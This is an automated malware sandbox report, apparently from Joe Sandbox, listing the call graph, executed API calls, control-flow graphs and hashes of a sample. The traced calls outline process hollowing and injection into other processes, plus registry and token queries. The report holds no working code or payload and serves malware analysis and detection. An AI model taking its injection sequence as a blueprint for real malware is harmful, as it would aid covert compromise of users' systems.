14763 b95b33 14764 b9087c 4 API calls 14763->14764 14765 b95b3b 14764->14765 14766 ba1937 14767 ba18a6 14766->14767 14768 ba1310 LoadLibraryA 14767->14768 14769 ba18e5 14768->14769 14769->14769 14414 b82e28 14416 b82e56 14414->14416 14415 b82ebf 14416->14415 14418 b96fc4 14416->14418 14420 b97021 14418->14420 14419 b970cc 14419->14415 14420->14419 14421 b98108 3 API calls 14420->14421 14421->14419 14784 ba1113 14786 ba111f 14784->14786 14785 ba1310 LoadLibraryA 14785->14786 14786->14785 14213 ba1310 14215 ba13b4 14213->14215 14216 ba138f 14213->14216 14214 ba1448 LoadLibraryA 14214->14216 14215->14214 14215->14216 14790 b9b516 14791 b9b52c 14790->14791 14792 b9a864 2 API calls 14791->14792 14793 b9ba3e 14791->14793 14798 b9b551 14792->14798 14794 b9acac 8 API calls 14794->14798 14795 b998dc 3 API calls 14795->14798 14796 b917c8 3 API calls 14796->14798 14797 b71e24 3 API calls 14797->14798 14798->14793 14798->14794 14798->14795 14798->14796 14798->14797 14799 b7c134 5 API calls 14798->14799 14800 b794f0 RegCreateKeyA RegOpenKeyA 14798->14800 14799->14798 14800->14798 14446 b80a0c 14450 b80a37 14446->14450 14447 b80ba8 14448 b7cec0 2 API calls 14447->14448 14448->14447 14449 b95f7c RegQueryValueExA RegCreateKeyA RegOpenKeyA 14449->14450 14450->14447 14450->14449 14452 b7cec0 14450->14452 14454 b7cf12 14452->14454 14453 b7d000 14453->14450 14454->14453 14455 b910cc 2 API calls 14454->14455 14455->14453 14456 bb1002 14461 bb100f 14456->14461 14457 bb1237 NtProtectVirtualMemory 14458 bb131c 14457->14458 14459 bb1288 14457->14459 14459->14458 14460 bb12d0 NtProtectVirtualMemory 14459->14460 14460->14458 14460->14459 14461->14457 14461->14458 14473 b9f668 14474 b9f6d9 14473->14474 14475 b9f6ee 14474->14475 14476 b87910 21 API calls 14474->14476 14476->14475 13781 b87c6c 13782 b87c7b 13781->13782 13783 b87c97 13781->13783 13782->13783 13785 b9a4bc 13782->13785 13786 b9a4f3 HeapCreate 13785->13786 13788 b9a537 13786->13788 13790 b9a52f 13786->13790 13789 b9a5e1 VirtualAlloc 13788->13789 13788->13790 13791 b9a6fc 13788->13791 13789->13791 13794 b9a629 13789->13794 13790->13783 13791->13790 13797 b7a92c 13791->13797 13792 b9a6e9 VirtualFree 13792->13791 13794->13792 13798 b7a944 13797->13798 13799 b7a983 13798->13799 13800 b7a97a FindCloseChangeNotification 13798->13800 13801 b96e1c 13799->13801 13800->13799 13802 b96e65 13801->13802 13803 b96e73 StrRChrA 13802->13803 13804 b96e88 13802->13804 13803->13804 13811 b9f7ec 13804->13811 13806 b96eed 13807 b96f83 13806->13807 13808 b96f7b 13806->13808 13809 b96f65 RtlAddVectoredContinueHandler 13806->13809 13807->13790 13819 b9c164 13808->13819 13809->13808 13812 b9f809 13811->13812 13813 b9f926 13812->13813 13814 b9f882 NtQueryInformationToken 13812->13814 13813->13806 13815 b9f8bd 13814->13815 13816 b9f918 NtClose 13815->13816 13817 b9f8c5 NtQueryInformationToken 13815->13817 13816->13813 13818 b9f8f2 13817->13818 13818->13816 13820 b9c19b 13819->13820 13821 b9c223 CreateMutexExA 13820->13821 13822 b9c255 13820->13822 13824 b9c242 13821->13824 13822->13807 13823 b9c4b9 GetUserNameA 13825 b9c4d6 13823->13825 13824->13822 13824->13823 13826 b9c667 13825->13826 13831 b9c688 13825->13831 13890 b91504 13825->13890 13826->13822 13826->13831 13893 b8ebd4 13826->13893 13831->13822 13875 b791fc 13831->13875 13832 b9c767 13878 b90f8c 13832->13878 13833 b9c71d 13833->13832 13899 b920f8 13833->13899 13835 b9c77e 13885 b8638c 13835->13885 13837 b9c783 13838 b9c88b 13837->13838 13839 b9c80b 13837->13839 13840 b9c859 13838->13840 13842 b9c89f 13838->13842 13858 b9c852 13838->13858 13839->13840 13841 b9c80d 13839->13841 13932 b7cb8c 13840->13932 13843 b9c84d 13841->13843 13844 b9c815 13841->13844 13854 b9c8dc 13842->13854 13856 b9c8af 13842->13856 13919 b8671c 13843->13919 13845 b9c81d 13844->13845 13846 b9c843 13844->13846 13849 b9c839 13845->13849 13845->13856 13845->13858 13915 b90ad0 13846->13915 13907 b7bf44 13849->13907 13850 b9c83e 13850->13822 13939 b9e864 13850->13939 13855 b7d064 29 API calls 13854->13855 13854->13858 13855->13858 13856->13858 13923 b7d064 13856->13923 13858->13822 13944 b910cc CreateThread 13858->13944 13861 b9ca1f 13864 b910cc 2 API calls 13861->13864 13862 b9cb54 13870 b9cb4f 13862->13870 13956 b8076c 13862->13956 13868 b9ca53 13864->13868 13865 b910cc 2 API calls 13865->13822 13866 b8076c 4 API calls 13866->13870 13867 b9ca98 13872 b910cc 2 API calls 13867->13872 13873 b9cafa 13867->13873 13868->13867 13947 b76818 13868->13947 13870->13822 13870->13865 13871 b9cb7a 13871->13866 13872->13873 13873->13822 13873->13870 13952 b832e4 13873->13952 13876 b8076c 4 API calls 13875->13876 13877 b79221 13876->13877 13877->13833 13963 b9a864 13878->13963 13880 b90fb9 13881 b90fca RegQueryValueExA 13880->13881 13883 b91001 13880->13883 13881->13883 13882 b91090 13882->13835 13883->13882 13967 b91e58 13883->13967 13886 b9a864 2 API calls 13885->13886 13887 b863a8 13886->13887 13888 b863b2 RegQueryValueExA 13887->13888 13889 b863ee 13887->13889 13888->13889 13889->13837 13970 b92e50 13890->13970 13894 b8ebfd 13893->13894 13974 b78690 13894->13974 13896 b8ecda 13896->13831 13897 b8ec45 13897->13896 13898 b78690 6 API calls 13897->13898 13898->13897 13900 b9211c 13899->13900 13901 b8076c 4 API calls 13900->13901 13904 b924ba 13900->13904 13905 b923ae 13900->13905 13902 b923a2 13901->13902 13902->13905 14009 b9087c 13902->14009 13904->13832 13905->13904 13906 b910cc 2 API calls 13905->13906 13906->13904 13910 b7bf62 13907->13910 13908 b7c079 13908->13850 13910->13908 14019 ba1600 13910->14019 13912 b78690 6 API calls 13913 b7c002 13912->13913 13913->13908 13914 b78690 6 API calls 13913->13914 13914->13913 13917 b90af9 13915->13917 13916 b76818 6 API calls 13918 b90b19 13916->13918 13917->13916 13917->13918 13918->13850 13922 b86738 13919->13922 13920 b86918 13920->13858 13921 b910cc 2 API calls 13921->13920 13922->13920 13922->13921 14027 b8e25c 13923->14027 13925 b7d080 13926 b8e25c 4 API calls 13925->13926 13929 b7d0a3 13925->13929 13926->13929 13927 b7d13c SleepEx 13930 b7d150 13927->13930 13928 b7d185 13928->13858 13929->13927 13929->13928 13929->13930 13930->13928 14033 b8f560 13930->14033 13933 b7cb9f 13932->13933 13934 b7cbd7 13933->13934 13935 b7cbbc 13933->13935 13936 b7cbd5 13934->13936 14189 b79b84 13934->14189 13937 b76818 6 API calls 13935->13937 13936->13850 13937->13936 13940 b8076c 4 API calls 13939->13940 13941 b9e880 13940->13941 14199 b8dc90 13941->14199 13943 b9e8ec 13943->13858 13945 b9110a QueueUserAPC 13944->13945 13946 b9111d 13944->13946 13945->13946 13946->13822 13946->13861 13946->13862 13948 b78690 6 API calls 13947->13948 13950 b76848 13948->13950 13949 b768a7 13949->13867 13950->13949 13951 b78690 6 API calls 13950->13951 13951->13950 13953 b83309 13952->13953 13955 b8337e 13953->13955 14202 b782f0 13953->14202 13955->13870 13957 b9a864 2 API calls 13956->13957 13958 b8079e 13957->13958 13959 b807a8 RegQueryValueExA 13958->13959 13960 b80839 13958->13960 13961 b8082e RegCloseKey 13959->13961 13962 b807cf 13959->13962 13960->13871 13961->13960 13962->13961 13964 b9a894 RegOpenKeyA 13963->13964 13965 b9a887 RegCreateKeyA 13963->13965 13966 b9a89f 13964->13966 13965->13966 13966->13880 13968 b9a864 2 API calls 13967->13968 13969 b91e92 13968->13969 13969->13882 13971 b9151b 13970->13971 13972 b92ea5 13970->13972 13971->13825 13972->13971 13973 b92f77 lstrcmp 13972->13973 13973->13972 13975 b786bb 13974->13975 13980 b786c3 13974->13980 13987 b81ac4 NtQueryInformationProcess 13975->13987 13977 b787ca 13977->13897 13980->13977 13981 b87dd8 13980->13981 13989 b9feb8 13980->13989 13982 b87e15 13981->13982 13986 b87e2f 13982->13986 14003 b91458 VirtualProtect 13982->14003 13985 b87ef6 VirtualProtect 13985->13986 13986->13980 13988 b81af4 13987->13988 13988->13980 13990 b92e50 lstrcmp 13989->13990 13991 b9fef5 13990->13991 13992 b91458 VirtualProtect 13991->13992 13994 ba006f 13991->13994 13993 b9ff1d 13992->13993 13993->13994 14005 b7e1d8 13993->14005 13994->13980 13996 b9ffdc VirtualProtect 13997 ba000d 13996->13997 14001 b81ac4 NtQueryInformationProcess 13997->14001 13998 b9ff4d 13998->13994 13998->13996 13999 b91458 VirtualProtect 13998->13999 14000 b9ff97 13999->14000 14000->13996 14002 b9ff9b VirtualProtect 14000->14002 14001->13994 14002->13996 14004 b87edb 14003->14004 14004->13985 14004->13986 14006 b7e2ab 14005->14006 14007 b7e20c 14005->14007 14006->13998 14007->14006 14008 b9feb8 5 API calls 14007->14008 14008->14006 14010 b909dc 14009->14010 14012 b9089f 14009->14012 14011 b91e58 2 API calls 14010->14011 14014 b9093d 14011->14014 14012->14014 14015 b75d98 14012->14015 14014->13905 14016 b75dc2 14015->14016 14017 b910cc 2 API calls 14016->14017 14018 b75e23 14016->14018 14017->14018 14018->14014 14020 b7bfe3 14019->14020 14021 ba1635 14019->14021 14020->13912 14021->14020 14023 ba1310 14021->14023 14025 ba13b4 14023->14025 14026 ba138f 14023->14026 14024 ba1448 LoadLibraryA 14024->14026 14025->14024 14025->14026 14026->14021 14028 b8e276 14027->14028 14049 b78a58 14028->14049 14031 b8e2a2 14031->13925 14032 b78a58 4 API calls 14032->14031 14034 b8f59a 14033->14034 14035 b8f604 NtSetInformationProcess 14034->14035 14037 b8f5af 14034->14037 14039 b8f63c 14034->14039 14036 b8f634 14035->14036 14035->14039 14084 b95fc4 14036->14084 14037->13928 14039->14037 14040 b8f6b4 CreateRemoteThread 14039->14040 14040->14037 14041 b8f6e6 14040->14041 14042 b8f6f9 14041->14042 14090 b7936c 14041->14090 14063 b727e8 14042->14063 14046 b8f721 ResumeThread 14048 b8f727 FindCloseChangeNotification 14046->14048 14047 b8f717 14047->14048 14048->14037 14050 b78a8d 14049->14050 14051 b78b31 14050->14051 14052 b78a99 RegOpenKeyExA 14050->14052 14051->14031 14051->14032 14053 b78abc 14052->14053 14053->14051 14059 b936dc RegQueryValueExA 14053->14059 14056 b78b26 RegCloseKey 14056->14051 14057 b936dc 2 API calls 14058 b78b21 14057->14058 14058->14056 14060 b93735 14059->14060 14061 b78afb 14059->14061 14060->14061 14062 b93786 RegQueryValueExA 14060->14062 14061->14056 14061->14057 14062->14061 14064 b7282a 14063->14064 14065 b72891 14064->14065 14113 b9676c 14064->14113 14069 b728b4 14065->14069 14071 b72a12 14065->14071 14096 b9add4 14065->14096 14110 b7cca0 14069->14110 14071->14046 14071->14047 14072 b728eb VirtualProtectEx 14073 b72912 14072->14073 14077 b7292a 14072->14077 14144 b7fb90 14073->14144 14075 b72941 ResumeThread 14076 b7295c SuspendThread 14075->14076 14076->14077 14077->14071 14077->14075 14078 b729a1 14077->14078 14079 b729ab VirtualProtectEx 14078->14079 14081 b9676c 14 API calls 14078->14081 14079->14071 14082 b729fa 14079->14082 14081->14079 14083 b7fb90 2 API calls 14082->14083 14083->14071 14085 b95fe3 14084->14085 14086 b9603e 14085->14086 14087 b7cca0 NtReadVirtualMemory 14085->14087 14086->14039 14088 b9600d 14087->14088 14088->14086 14089 b7cca0 NtReadVirtualMemory 14088->14089 14089->14086 14091 b79398 14090->14091 14092 b7cca0 NtReadVirtualMemory 14091->14092 14094 b793f6 14091->14094 14093 b793bf 14092->14093 14093->14094 14095 b83830 NtWriteVirtualMemory 14093->14095 14094->14042 14095->14094 14097 b9ae05 14096->14097 14098 b9ae2e NtQueryInformationProcess 14097->14098 14109 b9af75 14097->14109 14099 b9ae57 14098->14099 14098->14109 14100 b7cca0 NtReadVirtualMemory 14099->14100 14101 b9ae7f 14100->14101 14102 b7cca0 NtReadVirtualMemory 14101->14102 14101->14109 14103 b9aeb9 14102->14103 14104 b7cca0 NtReadVirtualMemory 14103->14104 14103->14109 14105 b9aee6 14104->14105 14106 b7cca0 NtReadVirtualMemory 14105->14106 14105->14109 14107 b9af40 14106->14107 14108 b7cca0 NtReadVirtualMemory 14107->14108 14107->14109 14108->14109 14109->14069 14111 b7ccb4 NtReadVirtualMemory 14110->14111 14112 b728d7 14110->14112 14111->14112 14112->14071 14112->14072 14114 b967ca 14113->14114 14115 b96805 RtlAllocateHeap 14114->14115 14118 b9682c 14114->14118 14121 b967f6 14114->14121 14115->14118 14115->14121 14116 b96d88 NtUnmapViewOfSection 14117 b96d97 14116->14117 14119 b96db2 NtClose 14117->14119 14117->14121 14118->14121 14139 b96d27 14118->14139 14148 b8387c 14118->14148 14119->14121 14121->14065 14122 b968ba 14122->14139 14154 b8ffcc NtMapViewOfSection 14122->14154 14124 b968fb 14125 b969cc 14124->14125 14128 b96ab8 14124->14128 14124->14139 14137 b96a81 14125->14137 14162 b817b8 14125->14162 14128->14137 14171 b8e8c8 14128->14171 14130 b817b8 2 API calls 14132 b96a54 14130->14132 14134 b817b8 2 API calls 14132->14134 14132->14137 14133 b8e8c8 5 API calls 14135 b96b42 14133->14135 14134->14137 14136 b8e8c8 5 API calls 14135->14136 14135->14137 14136->14137 14137->14139 14156 b7bab4 14137->14156 14139->14116 14139->14117 14140 b96c4c 14140->14139 14159 b83830 14140->14159 14143 b96d13 NtSetContextThread 14143->14139 14145 b83830 NtWriteVirtualMemory 14144->14145 14146 b7fbc0 VirtualProtectEx 14145->14146 14146->14077 14149 b838b8 14148->14149 14150 b839c9 NtCreateSection 14149->14150 14153 b83a3e 14149->14153 14151 b83a25 14150->14151 14150->14153 14152 b8ffcc NtMapViewOfSection 14151->14152 14152->14153 14153->14122 14155 b9001f 14154->14155 14155->14124 14157 b7baca NtAllocateVirtualMemory 14156->14157 14158 b7baf7 14156->14158 14157->14158 14158->14140 14160 b83844 NtWriteVirtualMemory 14159->14160 14161 b83855 14159->14161 14160->14161 14161->14139 14161->14143 14181 b797bc 14162->14181 14164 b797bc NtReadVirtualMemory 14166 b817f5 14164->14166 14165 b819b1 14165->14130 14165->14137 14166->14164 14168 b81868 14166->14168 14167 b7cca0 NtReadVirtualMemory 14167->14168 14168->14165 14168->14167 14169 b8199b 14168->14169 14170 b92e50 lstrcmp 14169->14170 14170->14165 14172 b8e8f0 14171->14172 14173 b92e50 lstrcmp 14172->14173 14175 b8e9f6 14172->14175 14174 b8e909 14173->14174 14174->14175 14176 b8e973 CreateFileA 14174->14176 14175->14133 14175->14137 14176->14175 14177 b8e9a8 SetFilePointer 14176->14177 14178 b8e9ed FindCloseChangeNotification 14177->14178 14179 b8e9bd ReadFile 14177->14179 14178->14175 14179->14178 14180 b8e9df 14179->14180 14180->14178 14182 b7980c 14181->14182 14183 b7cca0 NtReadVirtualMemory 14182->14183 14185 b799c9 14182->14185 14184 b7987c 14183->14184 14184->14185 14186 b7cca0 NtReadVirtualMemory 14184->14186 14185->14166 14188 b798a1 14186->14188 14187 b7cca0 NtReadVirtualMemory 14187->14188 14188->14185 14188->14187 14191 b79bb4 14189->14191 14190 b79d51 14190->13936 14191->14190 14192 b8076c 4 API calls 14191->14192 14193 b79ca2 14192->14193 14193->14190 14195 b79d84 14193->14195 14197 b79dbf 14195->14197 14196 b79ea6 14196->14190 14197->14196 14198 b78690 6 API calls 14197->14198 14198->14196 14200 b9a864 2 API calls 14199->14200 14201 b8dccf 14200->14201 14201->13943 14203 b7831b 14202->14203 14204 b78323 14202->14204 14203->13955 14204->14203 14205 b910cc 2 API calls 14204->14205 14205->14203 14841 b92960 14843 b92992 14841->14843 14842 b929ef 14843->14842 14844 b7cb8c 10 API calls 14843->14844 14844->14842 14845 b95763 14846 b9576c 14845->14846 14847 b9592b 14845->14847 14846->14847 14848 b75d98 2 API calls 14846->14848 14848->14847 13775 bb1158 13776 bb10a2 13775->13776 13777 bb131c 13776->13777 13778 bb1237 NtProtectVirtualMemory 13776->13778 13778->13777 13779 bb1288 13778->13779 13779->13777 13780 bb12d0 NtProtectVirtualMemory 13779->13780 13780->13777 13780->13779 14491 b83650 14493 b83671 14491->14493 14492 b83704 14493->14492 14495 b917c8 14493->14495 14496 b917f6 14495->14496 14497 b91989 14496->14497 14499 b91800 14496->14499 14498 b71e24 3 API calls 14497->14498 14501 b918bc 14498->14501 14500 b9a864 2 API calls 14499->14500 14499->14501 14500->14501 14501->14492

                                                                                                                                              Executed Functions

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 b9676c-b967c8 1 b967ca-b967dd 0->1 2 b967df-b967e7 0->2 3 b967ec-b967f4 1->3 2->3 4 b967fe-b96803 3->4 5 b967f6-b967f9 3->5 7 b96848-b96852 4->7 8 b96805-b96822 RtlAllocateHeap 4->8 6 b96dfe-b96e1a 5->6 9 b96858-b96868 7->9 10 b96d7e 7->10 11 b9682c-b96846 call b76450 8->11 12 b96824-b96827 8->12 9->10 13 b9686e-b96878 9->13 15 b96d83-b96d86 10->15 11->7 14 b96dd5-b96ddd 12->14 20 b9687e-b96882 13->20 21 b96aa5-b96aa8 13->21 14->6 22 b96ddf-b96df6 call b726aa 14->22 17 b96d88-b96d92 NtUnmapViewOfSection 15->17 18 b96d97-b96d9a 15->18 17->18 23 b96d9c-b96da7 18->23 24 b96dd0-b96dd1 18->24 25 b96888-b968c3 call b8387c 20->25 26 b96aae-b96ab3 20->26 21->25 21->26 22->6 28 b96da9-b96dab 23->28 29 b96db2-b96db9 NtClose 23->29 24->14 35 b968c9-b968ff call b8ffcc 25->35 36 b96d77-b96d7c 25->36 26->14 28->29 32 b96dad-b96db0 28->32 34 b96dbe-b96dc8 29->34 32->24 34->24 35->15 39 b96905-b96919 call b91158 35->39 36->15 39->15 42 b9691f-b96922 39->42 43 b96933-b96938 42->43 44 b96924-b9692e call b794d2 42->44 46 b9693a-b96940 43->46 47 b96963-b96989 call b794d2 43->47 44->43 46->47 48 b96942-b96943 46->48 52 b9698b-b96999 47->52 53 b9699c-b969a0 47->53 50 b96946-b96961 48->50 50->47 50->50 52->53 54 b969b9-b969c6 53->54 55 b969a2-b969b6 53->55 56 b96ab8-b96abf 54->56 57 b969cc-b969f6 54->57 55->54 58 b96ac1-b96ac8 56->58 59 b96ad7-b96afc 56->59 60 b969f8-b969ff 57->60 61 b96a0e-b96a31 call b817b8 57->61 58->59 63 b96aca-b96ad1 58->63 69 b96b88-b96b8a 59->69 70 b96b02-b96b26 call b8e8c8 59->70 60->61 64 b96a01-b96a08 60->64 61->69 71 b96a37-b96a5e call b817b8 61->71 63->59 67 b96b76-b96b7a 63->67 64->61 68 b96a93-b96aa0 64->68 72 b96b80-b96b83 call b794d2 67->72 68->72 69->15 73 b96b90-b96bd4 call b794d2 69->73 70->69 81 b96b28-b96b4c call b8e8c8 70->81 71->69 82 b96a64-b96a8b call b817b8 71->82 72->69 88 b96bda-b96c1f call b726aa * 2 73->88 89 b96d5c-b96d5e 73->89 81->69 90 b96b4e-b96b72 call b8e8c8 81->90 82->69 91 b96a91 82->91 101 b96d2b-b96d32 88->101 102 b96c25-b96c52 call b7bab4 88->102 89->15 94 b96d60-b96d6b 89->94 90->69 99 b96b74 90->99 91->68 94->15 97 b96d6d-b96d75 94->97 97->15 99->67 106 b96d3b 101->106 107 b96d34-b96d39 101->107 108 b96c58-b96c65 102->108 109 b96d42-b96d48 102->109 111 b96d3d-b96d40 106->111 110 b96d4a-b96d54 107->110 112 b96c7d-b96c7f 108->112 113 b96c67-b96c7b 108->113 109->110 110->89 111->109 111->110 112->111 114 b96c85-b96cda call b794d2 112->114 113->112 120 b96cdc-b96ce1 114->120 121 b96ce4-b96d02 call b83830 114->121 120->121 121->110 124 b96d04-b96d11 121->124 124->111 125 b96d13-b96d1f NtSetContextThread 124->125 126 b96d27-b96d29 125->126 126->111
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 1279760036-2766056989
                                                                                                                                              • Opcode ID: ee1595ae80a92ada7dedeeacb340e960b6c6dcc775881cad41c6e6d46d7a8d37
                                                                                                                                              • Instruction ID: a57ac4e02eac43b8afb62a3ce622ee63bdf3f9289973b8ec9f0ec74cf57970b5
                                                                                                                                              • Opcode Fuzzy Hash: ee1595ae80a92ada7dedeeacb340e960b6c6dcc775881cad41c6e6d46d7a8d37
                                                                                                                                              • Instruction Fuzzy Hash: 36126130718E098FDB69EF68D895AA673E1FB98301F40467EE45AC3251EF34ED418B85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 127 b9f7ec-b9f85b call b726aa 131 b9f861-b9f87c 127->131 132 b9f934-b9f93d 127->132 134 b9f882-b9f8c3 NtQueryInformationToken 131->134 135 b9f926-b9f927 131->135 137 b9f918-b9f920 NtClose 134->137 138 b9f8c5-b9f8f0 NtQueryInformationToken 134->138 135->132 137->135 139 b9f8f2-b9f901 call b794d2 138->139 140 b9f906-b9f910 138->140 139->140 140->137
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InformationQueryToken$Close
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 459398573-4108050209
                                                                                                                                              • Opcode ID: 75f5f25a32e44abd967634ea221ebc7d1d7f2de2e2c95ac0f277a3d61ca82601
                                                                                                                                              • Instruction ID: a2d21f195a9d7fe4321891b5a26d60266acc54aa8fedfdc284cfa71c49ab7463
                                                                                                                                              • Opcode Fuzzy Hash: 75f5f25a32e44abd967634ea221ebc7d1d7f2de2e2c95ac0f277a3d61ca82601
                                                                                                                                              • Instruction Fuzzy Hash: 73310930218B488FD764EF19D8C47AAB7E5FB98315F40497EE58AC3250DB34D905CB42
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 188 b8f560-b8f598 189 b8f59a-b8f5ad 188->189 190 b8f5bc-b8f5c6 188->190 189->190 198 b8f5af-b8f5b7 189->198 191 b8f5c8-b8f5eb 190->191 192 b8f5f2-b8f602 190->192 200 b8f5ed-b8f5ee 191->200 201 b8f646-b8f64b 191->201 193 b8f65f-b8f67c 192->193 194 b8f604-b8f632 NtSetInformationProcess 192->194 208 b8f67e-b8f680 193->208 196 b8f650-b8f658 194->196 197 b8f634-b8f644 call b95fc4 194->197 211 b8f65a-b8f65d 196->211 197->211 210 b8f753-b8f76d 198->210 200->192 205 b8f743-b8f746 201->205 209 b8f748-b8f749 205->209 205->210 208->205 212 b8f686-b8f6a5 208->212 209->210 211->193 211->208 214 b8f6ab-b8f6ae 212->214 215 b8f73e 212->215 214->215 216 b8f6b4-b8f6e4 CreateRemoteThread 214->216 215->205 217 b8f734-b8f73c 216->217 218 b8f6e6-b8f6ed 216->218 217->205 219 b8f6f9-b8f715 call b727e8 218->219 220 b8f6ef-b8f6f4 call b7936c 218->220 225 b8f721 ResumeThread 219->225 226 b8f717-b8f71f 219->226 220->219 227 b8f727-b8f732 FindCloseChangeNotification 225->227 226->227 227->205
                                                                                                                                              APIs
                                                                                                                                              • NtSetInformationProcess.NTDLL ref: 00B8F62A
                                                                                                                                              • CreateRemoteThread.KERNELBASE ref: 00B8F6DA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateInformationProcessRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3020566308-0
                                                                                                                                              • Opcode ID: 2a60409d33bb50b087945fb9e8025c27173b54c3f3ba081195cfe01e6e59568e
                                                                                                                                              • Instruction ID: af61f3cfb221af0b6884a90d1f14fac22f63214d45c0c7dd75fb3cf29f81a6a4
                                                                                                                                              • Opcode Fuzzy Hash: 2a60409d33bb50b087945fb9e8025c27173b54c3f3ba081195cfe01e6e59568e
                                                                                                                                              • Instruction Fuzzy Hash: 7951913061CB068FE758EF68D8996B677E1EBA9301F00857DE94AC3261EA70DD44CB81
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 269 b9a4bc-b9a4f1 270 b9a4fd-b9a4fe 269->270 271 b9a4f3-b9a4fb 269->271 272 b9a500-b9a52d HeapCreate 270->272 271->272 274 b9a52f-b9a532 272->274 275 b9a537-b9a560 272->275 276 b9a754-b9a757 274->276 280 b9a5b2-b9a5b8 275->280 281 b9a562-b9a56a 275->281 278 b9a759-b9a781 276->278 279 b9a7b2-b9a7cb 276->279 278->279 283 b9a783-b9a79a 278->283 286 b9a5ba-b9a5bc 280->286 287 b9a5ab-b9a5b0 281->287 288 b9a56c-b9a5a9 281->288 283->279 297 b9a79c-b9a7a7 283->297 286->276 289 b9a5c2-b9a5db call b861bc 286->289 287->286 288->286 295 b9a70e-b9a710 289->295 296 b9a5e1-b9a623 VirtualAlloc 289->296 295->276 299 b9a712-b9a72a call b84dc4 295->299 300 b9a629-b9a62e 296->300 301 b9a6fc 296->301 297->279 302 b9a7a9-b9a7b1 297->302 299->276 311 b9a72c-b9a74d call b7a92c call b96e1c 299->311 305 b9a6c4-b9a6c5 300->305 306 b9a634-b9a64d 300->306 303 b9a701-b9a709 301->303 302->279 303->295 310 b9a6cb-b9a6d2 305->310 308 b9a64f-b9a6b3 call b76450 306->308 320 b9a6b5-b9a6c2 308->320 313 b9a6e4 310->313 314 b9a6d4-b9a6e2 call b794d2 310->314 323 b9a752 311->323 315 b9a6e9-b9a6fa VirtualFree 313->315 314->315 315->303 320->310 323->276
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual$AllocCreateFreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2341667014-0
                                                                                                                                              • Opcode ID: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
                                                                                                                                              • Instruction ID: 71a383865ae931170778b3dc9de05fc2953fd1947765271941b6b137581e6ebf
                                                                                                                                              • Opcode Fuzzy Hash: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
                                                                                                                                              • Instruction Fuzzy Hash: 02919870618B098FEB58EF68E8857A673E5FB94310F10817DE59BC3251EF38D8428782
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_b71000_control.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexNameUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3764123871-0
                                                                                                                                              • Opcode ID: fffaa4b755b4794267c42af2f427b21d38ec734e3ecc3f810019e9c7598c9933
                                                                                                                                              • Instruction ID: 7067c7dc2f00ce20fe254a697297db65111374ebdc4668cb6f691fd913c996e1
                                                                                                                                              • Opcode Fuzzy Hash: fffaa4b755b4794267c42af2f427b21d38ec734e3ecc3f810019e9c7598c9933
                                                                                                                                              • Instruction Fuzzy Hash: 6A72C670618A498FEB68EF28EC856797BE1F758700F10457ED44BC3661DE39E942CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
